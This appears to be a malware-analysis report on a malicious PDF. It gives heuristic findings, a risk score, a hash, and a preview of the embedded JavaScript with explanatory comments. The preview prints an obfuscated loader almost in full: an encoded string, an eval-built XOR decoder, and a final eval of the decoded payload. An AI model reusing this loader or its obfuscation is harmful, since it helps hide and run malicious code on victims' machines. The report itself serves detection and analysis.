MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript with multiple eval() calls, indicating an attempt to obfuscate malicious code execution. The script appears to be designed to download and execute a second-stage payload, as suggested by the heuristic firings for PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The reconstructed string from the script is likely a URL or part of a command used in the attack.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
- JavaScript action — severity: low — 2 related findings — PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster — severity: critical — PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script:
function sDb27czri() {var datfield = 'jSjpMXxCfMrgSX1tgXchjrv'+'TY'+'XcVM0jp5q'+'cLU'+'BaTx'+'zQp1EQG7Xc'+'N5VjgxF33C08L'+'P'+'0'+'MW0HdWtFxf'+'7'+'XIakM8GPzvtMExfUXZBwE8GcX'+'x'+'LP0MW0H'+'dW'+'tzxGczQT1qRLMsCGWiSaFFve7EWXPYje0q001@MWjYc'+'hj@'+'R0'+'t0Mg_qI'+'AbXc'+'e0q0'+'01@MWj21'+'f'+'P0MW0HdWtzZXx0QX10je7K8Lm'+'saGWi'+'Sa'+'FFv'+'e'+'7E'+'W'+'X2'+'3dLUBaXcHjBMz8f'+'P0MW0'+'HdWtO1fbXaTxzQ'+'p1EQG'+'7XcaqHSNlE3Vw@xfUXaBv0mfkf8X1VmCRMla5'+'0'+'jHNXchjB1tmN8'+'HrX9pm'+'NQ'+'A'+'jSjpMXZ3O'+'pdV … -
- Embedded JS stream — severity: low — PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact — severity: medium — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x3D9 | 6032 bytes |

SHA-256: 17bdced587a035261b8935ece6dbb338ee0d1a6b1c61bc7905e0aae2bc67a191
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). 189 of 227 identifiers look randomly generated (e.g. 'jNKf3NckWgOk3NckWNlTrVckWHQI1gckWHKI9'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script — first 1,000 lines of the extracted script
// Preview of the carved PDF /JS object (javascript_obj0013_001.js in the artifact
// table above). As printed here the page wraps the `datfield` literal across
// lines, so this excerpt is not syntactically valid on its own; the carved file
// is the authoritative copy.
//
// sDb27czri: builds `datfield` from dozens of short single-quoted fragments
// joined with '+' (the string-concatenation obfuscation flagged by static
// triage), then passes it to the decoder kclE9it7 defined further down. The
// decoded text never appears on this page, so the report's "downloads a second
// stage" reading is an inference from the heuristics, not something this
// preview itself shows.
function sDb27czri() {var datfield = 'jSjpMXxCfMrgSX1tgXchjrv'+'TY'+'XcVM0jp5q'+'cLU'+'BaTx'+'zQp1EQG7Xc'+'N5VjgxF33C08L'+'P'+'0'+'MW0HdWtFxf'+'7'+'XIakM8GPzvtMExfUXZBwE8GcX'+'x'+'LP0MW0H'+'dW'+'tzxGczQT1qRLMsCGWiSaFFve7EWXPYje0q001@MWjYc'+'hj@'+'R0'+'t0Mg_qI'+'AbXc'+'e0q0'+'01@MWj21'+'f'+'P0MW0HdWtzZXx0QX10je7K8Lm'+'saGWi'+'Sa'+'FFv'+'e'+'7E'+'W'+'X2'+'3dLUBaXcHjBMz8f'+'P0MW0'+'HdWtO1fbXaTxzQ'+'p1EQG'+'7XcaqHSNlE3Vw@xfUXaBv0mfkf8X1VmCRMla5'+'0'+'jHNXchjB1tmN8'+'HrX9pm'+'NQ'+'A'+'jSjpMXZ3O'+'pdV'+'d'+'ivAaMMf'+'bBc'+'B7f'+'QXr'+'p8Xcq'+'afckmglg9Hckmglg'+'9Hc'+'kmglg9H'+'ckmHKf3VckuHl'+'kCVckWgONrAc'+'kmAm'+'3'+'rAc'+'kmAm'+'BdH'+'ckjNKV'+'9'+'HckjNMg9HckjNIIrV'+'ckjN'+'6BdgckWNKfS'+'V'+'ckW'+'NKI3NckmAIKCNckm'+'N'+'KHd'+'NckjNKf3'+'NckWg1k3'+'N'+'ckjNlT3N'+'ckjAKI1g'+'ckmgMS'+'SHckjAKI1gc'+'kWgZfSgckjNKX'+'9Hckj'+'NKf3Vc'+'kWg1k3NckWV5B9HckWg8U9gck'+'jN8TrHc'+'kmH'+'YB9'+'HckjNKpdHck'+'jNKf3NckjVQICgckW'+'V5k3'+'VckugYU9g'+'ck'+'Wg'+'xTdHckmHY'+'k'+'rHckj'+'NKpCNc'+'kjN'+'Kf3NckjVQICgc'+'kWV5kSgckuVQq9gckjHmk'+'CNckm'+'HY'+'31NckjN'+'KX1NckjNK'+'f3NckjVQI'+'Cg'+'ckWV5kSHc'+'km'+'HmU9gckmH'+'K0'+'d'+'Hckm'+'H'+'YUCNckjNKVCVckjNKf3'+'NckjVQICgckWV5S3N'+'ckW'+'HZq9gckmHQECgckmHYk9gc'+'k'+'jNK0d'+'AckjNKf3'+'Nc'+'kjV'+'QIC'+'g'+'ckjV'+'KI'+'3VckmNYSCNckjAQ09VckWgOTd'+'gckWNYTrV'+'ckjN6BCgckjNKfrNckWV'+'8k3N'+'ck'+'jA'+'QICgckWg1N3VckjNIprVck'+'jNZqdgckWg133'+'gckWNY3rVckmHY3rAckjN'+'K'+'I1gckjNKf3'+'NckmAY33NckWNxgrAckjAKVlHckug6B9gck'+'jNKf3NckWgOk3NckWNlTrVckWHQI1gckWHKI9'+'VckWgO33NckuVKprVckjHmU9'+'gckjNKf3'+'NckWVKf3NckjVQ'+'I1gckm'+'AxS3VckWVO'+'klNckWV'+'Q'+'I1gckmHYSS'+'gckjNKqdNckjNKf3N'+'ckjV'+'QfSVckW'+'H6N3Nck'+'WVlk'+'3Ncku'+'V8'+'@'+'dHckW'+'H6UdVckjNIp3Nc'+'kmAQ'+'E9gckjNKf3'+'NckjAQ'+'p1HckWg1N3NckjNl'+'TrV'+'ckjN'+'ZqdgckWg133gc'+'k'+'WNY3rVckjVKX9gckjNKf3Nck'+'mAxk3'+'NckWVYk'+'lAc'+'k'+'jVQfS'+'Vc'+'kmNSV3VckWVSV'+'1gckjHm3SVckuVKEdV'+'ckWVS03Nckj'+'V'+'QI1gckmAxSSHckWVOkrVckWVQI'+'1gckmHYSSg'+'ckjNKVSVckjNKf3NckjNKqdg'+'ck'+'jAQp1HckW'+'g1N3Nc'+'kjN
Y'+'TrVckjN9qdgckWg'+'133g'+'c'+'kWNY3rVckWNKX9gck'+'jN'+'Kf3Nc'+'kmAxk3NckWg1T1HckWNKpr'+'VckjNZ'+'qdgckWg133gckW'+'N'+'Y3rVckjNKX9gckjNKf3NckjV'+'Zf3NckWV90l'+'gckmH'+'ZfSVckmH'+'ZfSVck'+'mHZf'+'SVckmHZfSV'+'ckmHlS9V'+'ckWVxk3VckWg1'+'3SVc'+'km'+'H9V'+'dgc'+'kWV9p1AckmHKp1HckWg13rVckWg1B9HckjNY@CHckWVMS1gck'+'WV5kSH'+'ckj'+'A'+'SI1gckWg1gSHckWN8@CVckjNSE9gck'+'WV5T9'+'Vc'+'kjA5S1gckj'+'NSV3Nck'+'mNSp9Vck'+'jV'+'O3C'+'gc'+'kmgMTrNck'+'WHSfSVc'+'kmN'+'S0rAckj'+'NmTdAckWNKfdHckjH9Hrgc'+'kjNY@CVckWH83dNckjN'+'Sf3HckjV'+'Kp1Nck'+'jHZX'+'1g'+'ckjH8glgckjAQ0rHckWVxBdVckmH'+'1S1gckWVxS1gckjNS'+'V3VckmA'+'5NCHckjNlS'+'1gckWg1Tlg'+'ckWNl3rgckuHMkSVckjNI'+'I1gckjN'+'SI1gckWV'+'83dVc'+'kWH903HckjNKfSgc'+'k'+'jHI'+'X9gckjHmTdHckWVQp1H'+'ckj'+'Vl3lNc'+'kjVmT'+'3HckjNKprHcku'+'g1S1Ackug'+'mD'+'1gckWHKVdVckug'+'13CNckugx'+'SC'+'NckW'+'gx'+'DCHck'+'WH9I9gck'+'ugYS9HckWHZICNck'+'Wg6'+'S9HckW'+'gO3C'+'N'+'c'+'k'+'Wg8D1gckWgS0CN'+'ckWg8S'+'CNckWHZI1gc'+'kWg'+'6D1HckuHKK1'+'HckWg'+'1'+'SdAck'+'uH8N1NckuHxNdgckWHONCHckugmD9H'+'ckuH'+'9I9V'+'ck'+'mHmN1gz'+'@ZAjSjpMXxeRM8NFf'+'C'+'VzIde'+'lfMfbB'+'xH'+'6H1'+'HmB'+'1HmY'+'1'+'fO'+'pRXjTjTAqRG4KrN'+'DHCBcE1'+'fbBZ3OpdVdivAaM0y4fRGJHmejlxf'+'MY1'+'f'+'OpR'+'Xj'+'r80ki3e4E'+'RG50m'+'f'+'bBxe'+'RM8NFfCV'+'zIdelfMf'+'nBxL'+'8f8Cwz'+'8'+'GDfSN1SjT5YxH6V1A'+'PY1fOpRXj'+'@R0t0M'+'g_'+'q'+'Mf'+'bB'+'cB'+'7f'+'QXrp8X'+'c'+'qaf'+'ckjAm@1HckjAm@1Hz@ZAj@'+'R0t0Mg_'+'qMfbBcN5Vjgx'+'F3'+'3C'+'0'+'8LP0MW0HdWtFxf7XIak'+'M8GPz'+'v'+'tMEZ'+'AjSjpMXZVl2lem7v0'+'j21fwJrTmHuXA'+'p0CL'+'EW'+'X8D'+'Mfn'+'BxH6H'+'1Hm'+'B1Hm@'+'Z'+'yw'+'p0'+'e9M'+'vgI'+'0Rg'+'PVj3UBaT20m'+'fwSjpMXxW7qRaO'+'gWp1qzh'+'mY1W7qRaOgWp1qMh'+'SVd'+'awXjGRO1W7qRaO'+'gWp1qILs@xfUXxC'+'fM'+'rg'+'SX1tgOMW7qRaOgWp1qzRj21f'+'P'+'0MW0Hd'+'Wt'+'XZLjD'+'0B'+'8TlT2'+'Ed3'+'XO1fbXc_jSvB7V8'+'B'+'PiR'+'Gj2R3KEdp6'+'pd'+'g'+'zHmL'+'P'+'BZtjSjpMX'+'aNvK'+'zTMOvBxKvW1SIGj21'+'f'+'vXmX7SjecKjTMIzTMVj'+'e2z'+'Ry'+'1i'+'Q'+'010je7K8LP'+'Y'+'1fKpQ3c0uexfu'+'T'+'_'+'HC32XchjSr'+'pN'+'fRXsfjBJEMgVi'+'Ry'+'Mf8
X'+'4pQp'+'c'+'qZyeHSyJFafz@Z'+'AjSj'+'pMXZNNKW'+'T6'+'MuV3f'+'S'+'C1N'+'la'+'j21f7fQ'+'BjT3XMpvtw'+'SrpNfRXsfjBJEMgViRyrqv'+'pMplBwBdL4'+'SrpNfRXsfjBJEMgViRyrqvpMplBwTdL4Sr'+'pN'+'fRXsfjB'+'JEM'+'gViR'+'yrqvpMplBw3dLPY'+'1f'+'P'+'I8fwUZNNKWT6'+'MuV3f'+'S'+'C1NlaB'+'XdR'+'j2dh'+'jU'+'1fiSxfwUZN'+'NKWT6MuV3fSC1N'+'l'+'aBpdRj2dh'+'jT1fiSx'+'fDKIB'+'iqWtS'+'VzN'+'gH9'+'VL'+'O0HGXxhj3dLj'+'sm'+'_jDS3'+'YI8tqV'+'S0ZOlgSF'+'SW82Mf'+'oBcHP@xfoFmfwD'+'S3YI'+'8t'+'qV'+'S0ZO'+'lgS'+'F'+'SWm2'+'M'+'f'+'b21f'+'YBaki'+'BZNNKWT6MuV3fSC1NlaBpdRjs'+'1f8'+'@xfoFmfwDS'+'3YI8'+'t'+'qVS0Z'+'OlgSFSWm2Mfo'+'BZgP@xfUXcaqHSNlE3Vw@ZAjSjp'+'MXxXK0WT8i'+'SCwXdN'+'rpm'+'fbBcB7fQX'+'rp8Xcqaf'+'ckm'+'HrX9pckmH'+'rX9pz@ZAjDmeP'+'FvTw'+'BWNMIvX'+'kOle'+'m'+'kSp8zxGczQT'+'1q8'+'foBxg1@dgM@x'+'fmI3X'+'ipuag'+'q8HZVvXj'+'Y'+'chj'+'BW'+'NMI'+'vXkOlemkS'+'p8O'+'1f1'+'qvelzZp2F8Gv0Q'+'01iRXcXch'+'jNSG'+'4F'+'vpzzZp2F8GcV8BZ'+'7v'+'pPFvC7IQGwYuXx0ReqBa'+'fzscGl'+'KR'+'AjBWNMIv'+'XkOle'+'m'+'kS'+'p87jLUBc_j2mfnI'+'0N5T'+'8t8'+'kCp1'+'qcLU2'; function kclE9it7(GYvQc){ var tp = '63@25@2@62@1@20@21@3@28@41@0@0@0@0@0@0@18@37@54@57@42@19@7@48@39@47@10@43@33@31@58@27@4@44@60@46@50@22@59@61@55@26@40@0@0@0@0@52@0@56@16@8@9@49@35@38@36@11@13@34@30@29@0@17@51@23@14@6@53@45@12@5@24@32@15'; var QGRaRFlaIxVfka=0, Jkv2cbr1vZA0=GYvQc.length, gxrMZ=1024, ziLUo3aNy1, gmj2oM, MNXFXhRYeIv='', uWxG1mJaAHb0NO=QGRaRFlaIxVfka, OCF3scZ9A=QGRaRFlaIxVfka, KjwreAnB94=QGRaRFlaIxVfka, tMm6eOE3m9RyOT=Array(); tMm6eOE3m9RyOT = tp.split('@'); for(eval('gmj2oM=Ma'+'th.'+'ce'+'il(Jkv2cbr1vZA0'+'/gxrMZ)');gmj2oM>QGRaRFlaIxVfka;gmj2oM--){ for(eval('ziLUo3aNy1=M'+'ath'+'.m'+'in(Jkv2cbr1vZA0,'+'gxrMZ)');ziLUo3aNy1>QGRaRFlaIxVfka;ziLUo3aNy1--,Jkv2cbr1vZA0--){ eval('KjwreAnB94|'+'=(tMm6eOE3m9RyOT['+'GYvQc.'+'cha'+'rCo'+'de'+'At(uWxG1mJaAHb0NO+'+'+)-48])<'+'<OCF3scZ9A'); if(OCF3scZ9A){ eval('MNXFXhRYeIv+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](173^'+'KjwreAnB94&'+'25'+'5)'); KjwreAnB94>>=8; OCF3scZ9A-=2; } else { OCF3scZ9A=6; } } } 
// kclE9it7 (defined above, nested in sDb27czri): `tp` is an '@'-separated
// lookup table split into tMm6eOE3m9RyOT. The loop bounds (Math.ceil over
// 1024-char chunks, Math.min per chunk), the charCodeAt(...)-48 table index and
// the String["fromCharCode"] emit are all spelled as concatenated fragments and
// reached through eval, presumably so none of those API names appear as plain
// literals for a scanner. Per input character the table value is OR'ed into
// KjwreAnB94 shifted left by OCF3scZ9A; while OCF3scZ9A is non-zero one byte is
// appended as fromCharCode(173 ^ (KjwreAnB94 & 255)) ('&' binds tighter than
// '^' in JS), the accumulator shifts right by 8 and OCF3scZ9A drops by 2; at
// zero it resets to 6. The accumulated text MNXFXhRYeIv is then executed by
// the eval below — that is the PDF_JS_EXPLOIT_CLUSTER eval/fromCharCode
// staging indicator the heuristics section refers to.
eval(MNXFXhRYeIv); } kclE9it7(datfield);}